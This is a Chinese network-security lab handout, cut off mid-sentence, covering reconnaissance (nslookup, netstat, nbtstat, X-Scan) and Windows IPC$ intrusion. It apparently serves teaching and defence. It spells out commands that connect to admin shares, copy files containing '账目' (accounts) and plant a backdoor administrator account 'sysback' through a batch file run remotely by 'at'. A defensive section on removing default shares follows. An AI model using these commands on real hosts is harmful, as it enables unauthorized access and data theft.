计算机网络安全实验二.docVIP

实验一 信息收集及扫描工具的使用 【实验目的】 ● 掌握利用注册信息和基本命令实现信息搜集 ● 掌握结构探测的基本方法 ● 掌握 X－SCAN 的使用方法 【实验步骤】 一、 获取 以及 的基本信息。 1、利用nslookup和ping获取 IP 地址 2、利用 来获取信息 二、 使用 visualroute 或者下载 pingplotter 来获取到达的结构信息。 三、 获取局域网内主机 00 的资源信息。 1、ping–a 00 –t 获取主机名 2、netstat –a 00 获取所在域以及其他信息 3、net view 00 获取共享资源 4、nbtstat–a 00 获取所在域以及其他信息 四、使用X-SCAN 扫描局域网内主机00。 图 1-1 X-SCAN 主界面 1、设置扫描地址范围。 图 1-2 X-SCAN 扫描范围设置 2、在扫描模块中设置要扫描的项目。 图 1-3 X-SCAN 扫描模块设置 3、设置并发扫描参数。 图 1-4 X-SCAN 扫描参数设置 4、在扫描中跳过没有响应的主机。 图 1-5 X-SCAN 其他参数设置 5、设置要检测的端口及检测方式。 图 1-6 X-SCAN 检测方式设置 6、开设扫描，查看扫描报告。 【实验报告】 1、写出实验内容一中要求所获取的信息。 2、画出从本地主机到达 的结构信息。 实验二 IPC$入侵的防护 【实验目的】 ● 掌握 IPC$连接的防护手段 ● 了解利用 IPC$连接进行远程文件操作的方法。 ● 了解利用 IPC$连接入侵主机的方法。 【实验步骤】 一、IPC$连接的建立与断开。 通过 IPC$连接远程目标主机的条件是已获得目标主机管理员帐号和密码。 1、单击“开始”—“运行”，在“运行”对话框中输入“cmd”。 图 2-1 运行 CMD 2、建立 IPC$连接，键入命令 net use\\1\ipc$ “qqqqqq” /user: “administrator”。 图 2-2 建立 IPC$连接 3、映射网络驱动器，使用命令：net use z:\\1\c$。 4、映射成功后，打开“我的电脑” ，会发现多了一个Z盘，该磁盘即为目标主机的 C盘。 图 2-3 资源管理器 5、查找指定文件，用鼠标右键单击 Z盘，选择“搜索” ，查找关键字“账目” ，结果如图所 示。将该文件夹复制、粘贴到本地磁盘，其操作就像对本地磁盘进行操作一样。 6、断开连接，键入”net use */del”命令断开所有的 IPC$连接。 图 2-4 断开 IPC 连接 7、通过命令 net use\\目标 IP\ipc$\del 可以删除指定目标 IP 的 IPC$连接。 二、建立后门账号 1、编写 BAT 文件。打开记事本，键入“net user sysback 123456/add”和“net localgroup administrators sysback/add”命令，编写完后，另存为“hack.bat”。如图所示。 图 2-5 hack.bat 编辑 2、与目标主机建立 IPC$连接。 3、 复制文件到目标主机。 打开 MS—DOS， 键入“copy hack.bat \\1\d$”命令。 COPY 命令执行成功后，就已经把 E盘下的 hack.bat 文件拷贝到 1 的D 盘内。 图 2-6 hack.bat 复制 4、通过计划任务使远程主机执行 hack.bat 文件，键入”net time \\1”命令，查看目标系统时间。 图 2-7 hack.bat 远处执行 5、如果目标系统的时间为 23：22，则可键入“at \\1 23:30 d:\hack.bat”命令， 计划任务添加完毕后，使用命令“net use */del”断开 IPC$连接。 6、验证帐号是否成功建立。等一段时间后，估计远程主机已经执行了 hack.bat 文件。通过 建立 IPC$连接来验证是否成功建立“sysback”帐号。若连接成功，说明管理员帐号“sysback” 已经成功建立连接。 三、安全解决方案 1、在 PC（地址为 1）删除默认共享，通过“net share”了解共享资源。 图 2-8 共享资源 2、建立 BAT文件，文件名为 noshare.bat，内容如下： “net share ipc$ /del net share c$ /del net share d$/del” 3、将其复制到本机“开始”－“程序”－“启动”中。 4、禁止空连接，将该命令“net stop server /y”加入 noshare.bat 文件中，或通